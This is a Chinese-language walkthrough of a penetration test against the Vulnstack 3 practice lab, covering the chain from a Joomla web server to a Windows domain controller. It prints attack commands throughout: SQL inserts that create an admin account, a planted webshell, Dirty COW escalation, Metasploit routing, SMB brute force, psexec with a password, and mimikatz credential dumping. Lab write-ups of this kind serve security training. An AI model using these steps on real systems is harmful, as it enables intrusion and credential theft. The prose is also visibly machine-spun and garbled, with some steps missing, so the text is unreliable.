Vulnstack 3 域自然环境吊舱实战演练

将自然环境从官在网上免费下载出来,只必须添加相对的一个VMNET2的网口,且IP段为 必须进到centos重新启动一下网口,最少我是那么做的才寻找IP。 文中涉及到知识要点实际操作训练:Vulnhub之J...

将自然环境从官在网上免费下载出来,只必须添加相对的一个VMNET2的网口,且IP段为

必须进到centos重新启动一下网口,最少我是那么做的才寻找IP。

文中涉及到知识要点实际操作训练:Vulnhub之Joomla (这节课关键解读Vulnhub网站渗透测试实战演练射击场有关Joomla CMS的综合性渗入训练,根据该试验学习培训网站渗透测试的信息收集、漏洞扫描系统与运用、管理权限提高,最后获得/root下的flag。)

系统架构图

服务器发觉

nmap -sn 192.168.124.0/24

端口号

nmap -sS 192.168.124.16

搜集到3个端口号,暂不做所有扫描仪。那么就首先看下首页,以下。

web网站

是一个joomla的web页面,随手一个administrator放到url后边,见到后台管理,见到后台管理,见到后台管理。我还是较为乐观的人,总想要去尝试尝试一两个弱口令。实际总是会帮我一记洪亮的巴掌,不成功结束。

只能取出dirsearch,随后扫描仪下文件目录:

它是以末尾的文件后缀名,应当不容易被当做php实行,因此 ,

这个时候,就可以数据库连接了,那么就找登陆密码进后台管理。

难道说還是想我工程爆破?假如要我工程爆破,那这必定是个弱口令。先去在网上**(字典),取出大菠萝(john)便是一顿扫。**打完后,发觉对手分毫没动,那,那宣布不成功吧。都说不成功是取得成功的爹。然后换构思,便是在当地构建一个一模一样的。随后将自身mysql里的password字段名拷贝到总体目标数据库查询中去或是添加一个新用户,好懒是暗黑之魂2。随后,在网络上寻找立即添加到数据库查询的方式,在

改为总体目标设备上的表名就可以了:

INSERT INTO `am2zu_users`

(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)

VALUES ('Administrator2', 'admin2',

'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());

INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)

VALUES (LAST_INSERT_ID(),'8');

# 这儿便是添加了一个admin2的客户,登陆密码为secret

尽管登陆密码文件格式不一样,可是仍然能进后台管理。

在模版处能够改动网站源代码:Extensions-->Templates,在index.php中插进一句话,储存。

该展示尚方宝剑——蚁剑了,致命一击进到内网了。随后就翻车了

这,,,原来是被禁止使用了风险涵数,尽管不可以运行命令,可是能见到php版本,是php7的。随后发觉蚁剑有专业的绕开disable_function的软件,姿态非常好,有点儿狐气。随后对于php7的绕开逐个逐个试。

绕开了会弹出来一个新的互动式shell页面

管理权限太低,是个www-data的管理权限。坚信历经一番勤奋应用姿势提权,总是会失落的。那么就只有是自身沒有搞好信息收集,找:计划任务、/home、/etc/passwd、网址网站根目录、/tmp文件目录。最终在中国见到用户名密码

可是并沒有在本设备上发觉这一 wwwuser 的客户。干脆尝试下,又不违法犯罪。

居然成功了?猜想应当干了分享将http要求转到内网的服务器上,有内网就可以再次渗入。

而应用ssh连接的服务器的网口,有三个,一个连接外网,一个联接内网。

随后然后提权这台外网地址的服务器,很成功,看来是先拔头筹。看过下核心为2.6.32 而且是centos的电脑操作系统,立即应用脏牛提权取得成功。

获得一个msf对话,然后渗入。

添加路由器

meterpreter > run get_local_subnets

meterpreter > run autoroute -s 192.168.93.0/255.255.255.0

检测内网服务器的生存

# 对于windows

use auxiliary/scanner/smb/smb_version

# linux

use auxiliary/scanner/discovery/arp_sweep 用这一沒有检测出windows服务器

最后全部服务器以下

三个windows,2个应用ms17-010,无果。都没能获得对话。

啊,这....。最终效仿了下他人的方式,原来是工程爆破。字典不足强劲,最终還是将登陆密码添加到字典中来到(万般无奈)。倘若说我工程爆破出来

use auxiliary/scanner/smb/smb_login

set SMBUSER administrator

set PASS_FILE /root/桌面上/passlist

获得对话。现阶段的状况是windows在内网,添加的路由器是把战机带到到内网,应用reverse_tcp是联接不到了,只有顺向联接。

use exploit/windows/smb/psexec

set payload windows/x64/meterpreter/bind_tcp

set rhosts 192.168.93.30

set smbuser administrator

set smbpass 123qwe!ASD

随后取得2个对话,这一exploit必须多尝试几回,才行。

查询是不是在域自然环境

meterpreter > sysinfo

sysinfo" _src="">

在server2008上发觉域控登陆后的纪录,随后应用 mimikatz 获得到密文域控登陆密码。

load mimikatz

mimikatz_command -f privilege::debug

mimikatz_command -f sekurlsa::logonPasswords

获得域管理员账号登陆密码。因为登陆密码的独特性,尝试应用wmiexec.py一直没取得成功,2个在linux是特殊字符,表明再次实行上一条指令。随后根据下边方式取得shell

当今客户为

远程桌面连接

run post/windows/manage/enable_rdp

proxychains rdesktop 192.168.93.20

  • 发表于 2021-04-07 10:09
  • 阅读 ( 215 )
  • 分类:互联网

0 条评论

请先 登录 后评论
新华网
新华网

729 篇文章

你可能感兴趣的文章

相关问题